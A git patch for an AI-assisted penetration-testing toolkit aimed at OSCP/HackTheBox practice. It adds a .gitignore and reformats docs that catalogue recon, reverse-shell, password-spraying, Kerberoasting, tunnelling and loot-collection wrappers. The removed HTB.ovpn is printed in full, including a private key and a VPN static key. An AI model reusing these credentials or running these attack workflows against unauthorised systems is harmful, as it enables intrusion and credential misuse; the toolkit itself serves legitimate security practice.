From 322ba960af2abe0cd42837d79b7484038df2f676 Mon Sep 17 00:00:00 2001 From: 0xMarcio Date: Wed, 8 Oct 2025 16:05:08 +0200 Subject: [PATCH] chore(git): add .gitignore; purge accidentally tracked .ovpn and OS files - Add comprehensive .gitignore: OS cruft, caches, archives, VPN/secret files, captures\n- Remove previously tracked .DS_Store and HTB.ovpn --- .DS_Store | Bin 6148 -> 0 bytes .gitignore | 66 ++++++++++++++++++++++++++++++++++++++++ HOWTO.md | 44 +++++++++++++-------------- HTB.ovpn | 87 ----------------------------------------------------- README.md | 25 ++++++++++----- TOOLKIT.md | 46 ++++++++++++++-------------- 6 files changed, 128 insertions(+), 140 deletions(-) delete mode 100644 .DS_Store create mode 100644 .gitignore delete mode 100644 HTB.ovpn diff --git a/.DS_Store b/.DS_Store deleted file mode 100644 index 8e6053b5c1446d23c271414a9c7378619180f5dd..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 6148 zcmeHKO-}+b5Pe0W1U+yv9yeaRE%6_02qu~sFQ{h)iI^-xU{}S{{s#ZBzG(~D4^zs*G^|T)3@1n7l7%c52rv2K!Yk+Z?ahn=mtp;U4 z8Te}q$h+IXJyIkXA@~0F<4K=$axiqL;inb$*7#48{$)B(W}G`g4-3q>+7M&3am(`{ z=IUdP=NxyLE1|Y=!|@O^YaP=v!+_Qidv6vK^oi@UUHNR4%IUw$dS`Y&Ddut#ZP-aO z@5|l4;|bGZj5+3-#oeFdnsFg__JS#%Oa6x?|2yE(vn*>~*;tXvPZ;2xEz;O`sI4-f3@8ID2IPDQsDhEl z%%MFx*vRoO^L0TH_T`g7Fz^_8%p7utVq7TEg&O~hVO%)vf%l6%W)59AjLpn-d}ibS zP>jt^dtlvRB8S>41Ij>=fgLw&$^C!!{r`V4NJq+mGVre$F!gS)+u@e{-CEh4+_eGq rjw&L4nL``G#$U&_BUkYe)e7eV=@282nL}DA`XOLx&_)^fRR+EQnklcj diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..9cbe92d --- /dev/null +++ b/.gitignore @@ -0,0 +1,66 @@ +# OS +.DS_Store +Thumbs.db + +# Editors/IDE +.vscode/ +.idea/ + +# Python +__pycache__/ +*.py[cod] +*.pyo +*.egg-info/ +.venv/ +venv/ +.env +.env.* +.python-version + +# Node/JS +node_modules/ + +# Logs & caches +*.log +logs/ +tmp/ +*.tmp +.pytest_cache/ +.mypy_cache/ +.ruff_cache/ +.tox/ +.cache/ + +# Coverage/build +.coverage* +coverage/ +htmlcov/ +dist/ +build/ + +# Archives & captures +*.zip +*.tar +*.tar.gz +*.tgz +*.7z +*.gz +*.rar +*.pcap +*.pcapng + +# VPN/Secrets & credentials +*.ovpn +*.key +*.pem +*.crt +*.kdbx +*.rdp +*.pfx + +# Project-specific ignores +# Do not commit bulky artifacts accidentally +targets/*/www/* +# Keep scan results, but ignore raw packet captures +targets/*/scans/*.pcap* + diff --git a/HOWTO.md b/HOWTO.md index d7f5f65..48b97c3 100644 --- a/HOWTO.md +++ b/HOWTO.md @@ -1,6 +1,6 @@ -PentestPilot — HOWTO +# PentestPilot — HOWTO -Table of Contents +## Table of Contents - Overview — #overview - Install & Setup — #install--setup - Core Env Vars — #core-env-vars @@ -22,13 +22,13 @@ Table of Contents - Customization — #customization - Appendix — Common Command Recipes — #appendix--common-command-recipes -Overview +## Overview - This toolkit streamlines OSCP/HTB workflows: discovery, web recon, AD, credential hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting, and AI‑assisted orchestration. - Everything is CLI‑first, idempotent when possible, and resume‑aware via a per‑target manifest. - See: README.md:1 for the quick summary and TOOLKIT.md:1 for the command catalog. - Tips and conventions below assume a Linux attacker VM (Kali/Parrot/Ubuntu). Adjust paths for your OS. -Install & Setup +## Install & Setup 1) Place the repo in your working directory (e.g., `~/hax/htb`). 2) Load the shell profile so aliases and PATH work: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc @@ -56,13 +56,13 @@ Notes: - If a wrapper says a tool is missing, either install or skip that specific step. - Use `pipx` (or venv) for Python‑based tools to avoid site‑packages collisions. -Core Env Vars +## Core Env Vars - `HTB_ROOT` (default: current repo path) — base for targets and scripts. - `TARGET` — a current target convenience var set by `settarget`. - `OUTDIR` — output directory for scans in the current target (set by `settarget`). - Proxies: `HTTP_PROXY`/`HTTPS_PROXY` can be toggled via `proxy_toggle.sh on|off`. -Target Workflow +## Target Workflow 1) Create a target workspace: settarget 10.10.10.10 This creates `targets//{scans,loot,www,exploits}` and sets `OUTDIR`. @@ -89,7 +89,7 @@ Quick Aliases - Dashboard: `dashboard` (status), `resumeall`, `techactions` - QoL: `proxyon`, `proxyoff`, `cleanupscans`, `tmux_init.sh` -Automation & Orchestration +## Automation & Orchestration - Minimal recon: `auto_recon.sh ` - Web recon (current TARGET): `web_recon.sh ` → headers/tech/backup/dirb (+screenshots if `gowitness`) - Wide recon (list of hosts): `wide_web_recon.sh ` → httpx + nuclei + screenshots @@ -111,7 +111,7 @@ Advanced: Pipeline Semantics - Each phase records elapsed seconds and evidence file paths in manifest meta. - If a run fails midway, you can re‑invoke with `--resume` to continue where you left off. -Dashboard (Status & Evidence) +## Dashboard (Status & Evidence) - Command: `dashboard` Options: `--no-color`, `--compact`, `--json` - Columns: - target, created, last (timestamp of last pipeline), urls (count) @@ -123,7 +123,7 @@ Dashboard (Status & Evidence) - httpx JSON: `OUTDIR/httpx_.json` and `httpx_.summary.json` - nuclei JSON: `OUTDIR/httpx2nuclei_/nuclei.json` and `summary.json` -Manifest (State & Resume) +## Manifest (State & Resume) - Path: `targets//manifest.json` - Schema (high‑level): { @@ -150,7 +150,7 @@ Manifest (State & Resume) - `taskstatus ` — prints status; exit 0 if ok, 2 if running, 1 otherwise - `taskreset ` — remove/reset a task entry -AI Integrations +## AI Integrations - Providers: OpenAI (OPENAI_API_KEY) or local Ollama (defaults chosen automatically). - Robust helpers: `bin/ai/_ai_utils.py:1` (retries, timeouts, prompt truncation) - Tools: @@ -164,7 +164,7 @@ Troubleshooting AI: - If no OPENAI_API_KEY is set, the system falls back to Ollama (ensure it’s running). - You can reduce output size by setting smaller prompts and using `--compact` when calling dashboard. -Web Recon & Routing +## Web Recon & Routing - Pipeline: `httpx_to_nuclei.sh` → httpx alive list → nuclei with auto severity (based on URL count) → produces `.txt`, `.json`, `summary.json`. - Tech routing: `httpx_tech_route.py` flags: - `--tech` filter; `--severity` list; `--wpscan [--wpscan-limit N]`; `--extra [--extra-limit N]`; `--dry-run` @@ -174,43 +174,43 @@ Web Recon & Routing - `httpx_presets.sh`: concurrency profiles; `httpx_probe.sh` for fast probes - `gobuster_dir.sh`, `gobuster_vhost.sh`; `dirbuster.sh` (ffuf); backup hunters, CORS/methods/TLS, LFI tester -Active Directory & SMB +## Active Directory & SMB - Impacket wrappers: `getnpusers_wrapper.sh`, `getspns_wrapper.sh` - `kerbrute_wrapper.sh` (user enum), `cme_quick.sh` (shares/sessions/loggedon), `rpc_quick.sh` - SMB `smbmap_quick.sh` and `smb_check_write.sh` -Passwords & Wordlists +## Passwords & Wordlists - `mutate_words.py`, `merge_dedupe.sh`, `wordlist_cleanup.sh` — build/clean wordlists - `spray_http_basic.sh` — cautious HTTP Basic Auth spray (respect lockout policies) -Shells, Transfers, Privesc +## Shells, Transfers, Privesc - Shells: reverse one‑liners (`revsh.py`), listener (`listener.sh`), TTY upgrade tips - Transfers: `http_serve.sh` or `serve.py` (with web upload), `smb_server.sh`, `dl_oneshots.sh`, `push_http.sh` - Linux privesc: `linux_quick_enum.sh`, `suid_scan.sh`, `caps_scan.sh` - Windows privesc: `privesc_quick.ps1`, `find_unquoted_services.ps1`, `find_path_writable.ps1`, `win_share_enum.ps1` -Tunnels & Port Forwards +## Tunnels & Port Forwards - `chisel_server.sh` / `chisel_client.sh` — reverse tunnels - `autossh_socks.sh` — resilient SOCKS proxy - `socat_forward.sh` and `port_forward.sh` — local/remote forwards -QoL Utilities +## QoL Utilities - `cleanup_scans.sh` — prune old scan files - `proxy_toggle.sh` — set/unset HTTP(S) proxy env vars - `tmux_init.sh` — quick tmux workspace - `extract_urls.py` — harvest URLs from files (logs/notes) -Post‑Exploitation & Reporting +## Post‑Exploitation & Reporting - `linux_loot.sh` — safe, size‑capped artifacts collector (config via env: `MAX_SIZE`, `INCLUDE_*`) - `windows_loot.ps1` — conservative Windows loot collector (zip fallback) - `pack_report.sh` — compiles a markdown with summaries and file listings -Safety Notes +## Safety Notes - Use only with explicit authorization. - Many steps are safe by default (no brute force). Be mindful of account lockout policies when using auth‑related tooling. - For “unsafe” or exploit‑heavy checks, consider separate gated wrappers and explicit flags. -End‑to‑End Example +## End‑to‑End Example 1) Set up target and notes: settarget target.htb notesinit @@ -225,18 +225,18 @@ End‑to‑End Example 6) Resume across multiple targets later: resumeall -Troubleshooting +## Troubleshooting - Tool missing: wrappers fail gracefully and log hints. Install optional tools (httpx, nuclei, gobuster, gowitness, wpscan, droopescan, joomscan, magescan, impacket). - Manifest stuck in running: `manifest.py taskreset `. - No colors in dashboard: add `--no-color` or your terminal might not support ANSI. -Customization +## Customization - Adjust tags/severity in `httpx_to_nuclei.sh:1` and `httpx_tech_route.py:1`. - Extend tech presets and quick wrappers in `bin/web/`. - Tweak agent behaviors in `bin/ai/agent_orchestrator.py:1`. - Add your own manifest keys via `manifest.py set key value` for custom dashboards. -Appendix — Common Command Recipes +## Appendix — Common Command Recipes - Directory brute (gobuster): gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50 - Vhost brute: gobuster_vhost.sh http://$TARGET/ subdomains-top1million-5000.txt 100 - Probe techs: httpx_probe.sh hosts.txt > live.txt diff --git a/HTB.ovpn b/HTB.ovpn deleted file mode 100644 index c68f7cb..0000000 --- a/HTB.ovpn +++ /dev/null @@ -1,87 +0,0 @@ -client -dev tun -proto tcp -remote edge-eu-free-2.hackthebox.eu 443 -resolv-retry infinite -nobind -persist-key -persist-tun -remote-cert-tls server -comp-lzo -verb 3 -data-ciphers-fallback AES-128-CBC -data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM -tls-cipher "DEFAULT:@SECLEVEL=0" -auth SHA256 -key-direction 1 - ------BEGIN CERTIFICATE----- -MIICDjCCAcCgAwIBAgIQAY7iX+I6dfaVWaMJXidIRTAFBgMrZXAwZDELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs -MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcN -MjQwNDE1MTUyODM4WhcNMzQwNDE1MTUyODM4WjBeMQswCQYDVQQGEwJHUjEVMBMG -A1UEChMMSGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMSYwJAYDVQQDEx1I -VEIgVlBOOiBldS1mcmVlLTIgSXNzdWluZyBDQTAqMAUGAytlcAMhANRtLwPdgQ/j -oGEo7GTBqm6rNN83vgRsVqMf9cP83KlMo4GNMIGKMA4GA1UdDwEB/wQEAwIBhjAn -BgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8GA1UdEwEB -/wQFMAMBAf8wHQYDVR0OBBYEFD2YUNtsvUD2ynIAtfr1Uk1NjYz8MB8GA1UdIwQY -MBaAFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUGAytlcANBAKYH1gYc72heLF8mu2vo -8FAcozEtFv+2g1OFvahcSoPrn7kbUcq8ebGb+o6wbgrVm8P/Y/c3h5bmnw5y8V3t -9gw= ------END CERTIFICATE----- ------BEGIN CERTIFICATE----- -MIIB8zCCAaWgAwIBAgIQAY7Mx8YFd9iyZFCrz3LiKDAFBgMrZXAwZDELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs -MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwIBcN -MjQwNDExMTA1MDI4WhgPMjA1NDA0MTExMDUwMjhaMGQxCzAJBgNVBAYTAkdSMRUw -EwYDVQQKEwxIYWNrIFRoZSBCb3gxEDAOBgNVBAsTB1N5c3RlbXMxLDAqBgNVBAMT -I0hUQiBWUE46IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MCowBQYDK2VwAyEA -FLTHpDxXnmG/Xr8aBevajroVu8dkckNnHeadSRza9CCjazBpMA4GA1UdDwEB/wQE -AwIBhjAnBgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8G -A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUG -AytlcANBABl68VB0oo0rSGZWt6L+LNMnyHEJl+CQ+FTjQfzE6oqEMAvJTzdjMyeG -OOUNlQYwGRVajOauFa/IMvDsTBXOgw8= ------END CERTIFICATE----- - - ------BEGIN CERTIFICATE----- -MIIBxjCCAXigAwIBAgIQAZQTnGxLc3eYzWO9SnM9sjAFBgMrZXAwXjELMAkGA1UE -BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEm -MCQGA1UEAxMdSFRCIFZQTjogZXUtZnJlZS0yIElzc3VpbmcgQ0EwHhcNMjQxMjI5 -MTgxMDA2WhcNMzQxMjI5MTgxMDA2WjBKMQswCQYDVQQGEwJHUjEVMBMGA1UEChMM -SGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMRIwEAYDVQQDEwltcC0yNzQ1 -NjQwKjAFBgMrZXADIQDiwraGYtEpx63P6AMDQgczmsx4WO9iVPGTkVRRkyHrmqNg -MF4wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD -ATAMBgNVHRMBAf8EAjAAMB8GA1UdIwQYMBaAFD2YUNtsvUD2ynIAtfr1Uk1NjYz8 -MAUGAytlcANBANAkGgddoR9WIbfv3C8gIPx6ivEyq1Tlo354JG/y+lv015bOjrmy -aL7cF4ILRaPTbxWeBfVeVQOwLrz4rCBwsg0= ------END CERTIFICATE----- - - ------BEGIN PRIVATE KEY----- -MC4CAQAwBQYDK2VwBCIEIAA2VTVH7CjQQECTQGg/FAy+5uJ6fGSRN5vAbeK3qawi ------END PRIVATE KEY----- - - -# -# 2048 bit OpenVPN static key -# ------BEGIN OpenVPN Static key V1----- -85341e27fb3510f97f3455db449ea6c4 -bf6b87e90802ced4c36feaa162ddd218 -9df22b9895d5770fd942b745b8d5532b -716fa58ac45e0f59b589ae1bc7ad11c7 -633c0c811b2ff682a35da172f6b32452 -410c971b8d422502aa012a37422d63bc -8ce669f3f1ded38144e3df1d0b689ae3 -5fa92a5f23600fba10da3ce71163e128 -bbac0bc5a922c16f3803f9dc36be960a -6cb371df43583fef525aa529ef2615b9 -95d7acd479cf90eada71684bec3c70e3 -2f2d25a66732544c5bc5f225d01940b7 -b66cf57327a3331ec7550e915bdc68a9 -4949a88a101f2d3383268fd32ffece1d -7d8d62d679707ae0c4d36a582b4a2a8f -24ee9da8eefa18339cd8d6425dceef89 ------END OpenVPN Static key V1----- - \ No newline at end of file diff --git a/README.md b/README.md index 6152c58..da6c1c5 100644 --- a/README.md +++ b/README.md @@ -1,11 +1,20 @@ -PentestPilot +# PentestPilot -- Overview -- Script‑driven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting. -- AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama. -- New? Start with HOWTO.md:1 for step‑by‑step usage, dashboard details, and resumeable pipelines. +AI‑assisted pentest recon and orchestration toolkit with resumeable pipelines, a rich terminal dashboard, and tech‑aware routing. -Quick Start (Dashboard in ~3–5 minutes) +[![Made for Pentesters](https://img.shields.io/badge/made_for-pentesters-111827?style=for-the-badge)](#) +[![AI‑Ready](https://img.shields.io/badge/AI-Ready-10B981?style=for-the-badge)](#) +[![Resumeable Pipelines](https://img.shields.io/badge/Pipelines-Resumeable-2563EB?style=for-the-badge)](#) +[![Dashboard](https://img.shields.io/badge/Dashboard-Color%20%7C%20JSON-7C3AED?style=for-the-badge)](#) + +## Overview +Script‑driven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, post‑exploitation, reporting. + +AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama. + +New? Start with HOWTO.md:1 for step‑by‑step usage, dashboard details, and resumeable pipelines. + +## Quick Start (Dashboard in ~3–5 minutes) - Clone/open the repo and load the shell profile: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc && exec zsh - Minimal deps (Debian/Ubuntu): @@ -56,11 +65,11 @@ Features at a Glance Dependencies - Recommended: nmap, ffuf, httpx, nuclei, gobuster, gowitness, subfinder|amass, sqlmap, wpscan, droopescan, joomscan, magescan, impacket, ldap-utils, snmp, ripgrep, jq, python3 requests, socat, chisel -Documentation +## Documentation - HOWTO.md:1 — in‑depth “how to” with recommended tools, pipeline semantics, dashboard legend, manifest schema, and examples. - TOOLKIT.md:1 — command catalog grouped by category with references back to HOWTO. -Docs Index (quick links) +### Docs Index (quick links) - HOWTO: Overview — HOWTO.md#overview - Install & Setup — HOWTO.md#install--setup - Core Env Vars — HOWTO.md#core-env-vars diff --git a/TOOLKIT.md b/TOOLKIT.md index 27cc5bc..79a269e 100644 --- a/TOOLKIT.md +++ b/TOOLKIT.md @@ -1,8 +1,8 @@ -PentestPilot — Quick Reference +# PentestPilot — Quick Reference For step‑by‑step usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted. -Table of Contents +## Table of Contents - Setup — #setup - Core Workflow — #core-workflow - Enumeration — #enumeration-requires-target @@ -25,13 +25,13 @@ Table of Contents - Hashes — #hashes-binhashes - Tips — #tips -Setup +## Setup - Keep this repo in a working folder, e.g., htb/. - Source the shell helpers from your main zshrc: echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc - Open a new shell or run: source .zshrc.htb -Core Workflow +## Core Workflow - settarget - Creates targets/ with scans, loot, www, exploits. - Sets OUTDIR to the target’s scans directory. @@ -41,7 +41,7 @@ Core Workflow - notesinit → scaffold notes.md in target directory - notesattach → append scan artifacts summary to notes -Enumeration (requires TARGET) +## Enumeration (requires TARGET) - nq → Quick nmap: scripts + versions - nf → Full TCP: -p- then service/version - nu → UDP top 200 @@ -58,7 +58,7 @@ Individual scripts (bin/) - ftp_enum.sh - snmp_enum.sh [community] -Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest +## Automation (bin/automation/) — see HOWTO: Automation & Orchestration, Dashboard, Manifest - auto_recon.sh [--no-udp] - parse_nmap_open_ports.sh <*.gnmap> - report_summary.py <*.gnmap ...> @@ -96,7 +96,7 @@ dashboard --compact resumeall ``` -Web helpers (bin/web/) — see HOWTO: Web Recon & Routing +## Web helpers (bin/web/) — see HOWTO: Web Recon & Routing - dirbuster.sh [wordlist] [exts] — ffuf directory fuzz - vhost_ffuf.sh [wordlist] — virtual hosts - param_fuzz.sh [wordlist] — parameter discovery @@ -144,7 +144,7 @@ gobuster_vhost.sh http://$TARGET/ /usr/share/wordlists/seclists/Discovery/DNS/su gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50 ``` -Reverse shells (bin/shells/) +## Reverse shells (bin/shells/) - revsh.py — prints common one-liners - listener.sh — rlwrap + nc/ncat listener - tty_upgrade.sh — quick TTY tips @@ -161,7 +161,7 @@ revsh.py YOUR_IP 4444 tty_upgrade.sh ``` -File transfer (bin/transfer/) +## File transfer (bin/transfer/) - http_serve.sh [port] — simple Python HTTP server - serve.py [port] — HTTP server with web upload (POST /upload) - push_http.sh — upload to serve.py @@ -181,7 +181,7 @@ push_http.sh loot.txt http://YOUR_IP:8000/upload smb_server.sh share ./loot ``` -Crypto / Text (bin/crypto/) +## Crypto / Text (bin/crypto/) - encoders.py b64e|b64d|urle|urld|hex|unhex|xor|rot - jwt_show.py — decode header/payload (no verify) @@ -191,7 +191,7 @@ encoders.py b64e 'secret'; encoders.py urle 'a b' jwt_show.py eyJhbGciOi... ``` -Privilege Escalation (bin/privesc/) +## Privilege Escalation (bin/privesc/) - linux_quick_enum.sh — basic local recon - suid_scan.sh — list SUID/SGID - caps_scan.sh — list file capabilities @@ -202,7 +202,7 @@ linux_quick_enum.sh caps_scan.sh ``` -Misc (bin/misc/) +## Misc (bin/misc/) - cyclic.py create | offset — pattern + offset - port_forward.sh — wrappers for ssh -L/-R/-D - extract_urls.py @@ -214,7 +214,7 @@ port_forward.sh -L 8080:127.0.0.1:80 user@host extract_urls.py notes.md ``` -AI (bin/ai/) — see HOWTO: AI Integrations +## AI (bin/ai/) — see HOWTO: AI Integrations - ask.py [-m model] [-s system] "prompt" | - (stdin) - wordlist_from_context.py [context-file|-] - orchestrate_web.py @@ -237,7 +237,7 @@ orchestrate_web.py hosts.txt agent web hosts.txt ``` -Active Directory (bin/ad/) +## Active Directory (bin/ad/) - getnpusers_wrapper.sh [userlist.txt] - getspns_wrapper.sh - ldap_quick_users.sh [user pass] @@ -254,7 +254,7 @@ kerbrute_wrapper.sh domain users.txt 10.10.10.5 cme_quick.sh $TARGET user pass ``` -Passwords (bin/passwords/) +## Passwords (bin/passwords/) - mutate_words.py word1 [word2 ...] | - - spray_http_basic.sh - merge_dedupe.sh [file2 ...] — dedup merged lists @@ -269,7 +269,7 @@ wordlist_cleanup.sh merged.txt 8 64 > cleaned.txt spray_http_basic.sh http://$TARGET/protected users.txt Winter2025! ``` -Windows (bin/windows/) +## Windows (bin/windows/) - privesc_quick.ps1 — run on target - win_share_enum.ps1 -Target - find_unquoted_services.ps1 — potential service path issues @@ -283,7 +283,7 @@ powershell -ep bypass -f bin/windows/win_share_enum.ps1 -Target $TARGET powershell -ep bypass -f bin/windows/find_unquoted_services.ps1 ``` -Post-Exploitation (bin/post/) +## Post-Exploitation (bin/post/) - linux_loot.sh — targeted loot collector with size caps - windows_loot.ps1 — targeted loot collector (PowerShell) - pack_report.sh — merge loot/scans into markdown report @@ -294,7 +294,7 @@ LOOT_DIR=/tmp/loot MAX_SIZE=10485760 INCLUDE_DB=1 bin/post/linux_loot.sh bin/post/pack_report.sh $TARGET ``` -DNS (bin/dns/) +## DNS (bin/dns/) - zone_transfer.sh [ns] - subenum.sh - gobuster_dns.sh [wordlist] [threads] @@ -305,7 +305,7 @@ zone_transfer.sh target.htb gobuster_dns.sh target.htb /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt 100 ``` -Scanning (bin/scan/) +## Scanning (bin/scan/) - naabu_quick.sh [flags] - masscan_top.sh [rate] @@ -315,7 +315,7 @@ naabu_quick.sh $TARGET -p 1-65535 masscan_top.sh $TARGET 20000 ``` -Tunnels (bin/tunnel/) +## Tunnels (bin/tunnel/) - chisel_server.sh - chisel_client.sh R::: - autossh_socks.sh [lport] @@ -328,7 +328,7 @@ chisel_server.sh 8000 & chisel_client.sh YOUR_IP:8000 R:8080:127.0.0.1:80 ``` -Pwn (bin/pwn/) +## Pwn (bin/pwn/) - pwntools_template.py — starter exploit template Examples @@ -336,7 +336,7 @@ Examples python3 bin/pwn/pwntools_template.py REMOTE=1 HOST=$TARGET PORT=31337 ``` -Hashes (bin/hashes/) +## Hashes (bin/hashes/) - extract_ntlm_from_secretsdump.py [out] - john_pfx.sh — john format for PFX @@ -346,7 +346,7 @@ extract_ntlm_from_secretsdump.py secretsdump.out ntlm.txt john_pfx.sh cert.pfx > pfx.hash ``` -Tips +## Tips - OUTDIR controls where scans are saved; set by settarget. - Most scripts accept TARGET via env if argument omitted. - If a tool isn’t installed (ffuf, getcap, ldapsearch, snmpwalk), install it or adjust the command.